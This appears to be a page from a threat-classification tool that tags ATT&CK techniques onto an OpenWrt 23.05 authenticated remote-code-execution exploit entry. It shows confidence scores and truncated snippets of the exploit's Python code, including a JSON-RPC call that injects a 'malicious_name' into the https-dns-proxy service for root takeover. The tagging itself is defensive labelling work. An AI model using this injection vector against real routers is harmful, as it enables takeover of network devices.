[local] OpenWrt 23.05 - Authenticated Remote Code Execution (RCE)
ATT&CK techniques detected
T1190Exploit Public-Facing Application
87%
"[ local ] openwrt 23. 05 - authenticated remote code execution ( rce ) openwrt 23. 05 - authenticated remote code execution ( rce ) # exploit title : openwrt 23. 05 - authenticated remote code execution ( rce ) # date : 2026 - 01 - 17 # exploit author : ahmet mersin # vendor home…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
70%
"" id " : 666, " method " : " call ", " params " : [ session _ id, " luci. https - dns - proxy ", " setinitaction ", { " name " : malicious _ name, " action " : " start " } ] } try : r = requests. post ( endpoint, json = payload, timeout = 10 ) response = r. json ( ) print ( f " […"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1068Exploitation for Privilege Escalation
64%
"dns - proxy root takeover exploit cve - 202x - xxxxx | privilege escalation via command injection developed by : ahmetmersin. com " " " ) def get _ user _ input ( ) : print ( " [ * ] target router information : " ) target _ ip = input ( " router ip [ 192. 168. 1. 1 ] : " ). strip…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
37%
"dns - proxy root takeover exploit cve - 202x - xxxxx | privilege escalation via command injection developed by : ahmetmersin. com " " " ) def get _ user _ input ( ) : print ( " [ * ] target router information : " ) target _ ip = input ( " router ip [ 192. 168. 1. 1 ] : " ). strip…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
OpenWrt 23.05 - Authenticated Remote Code Execution (RCE)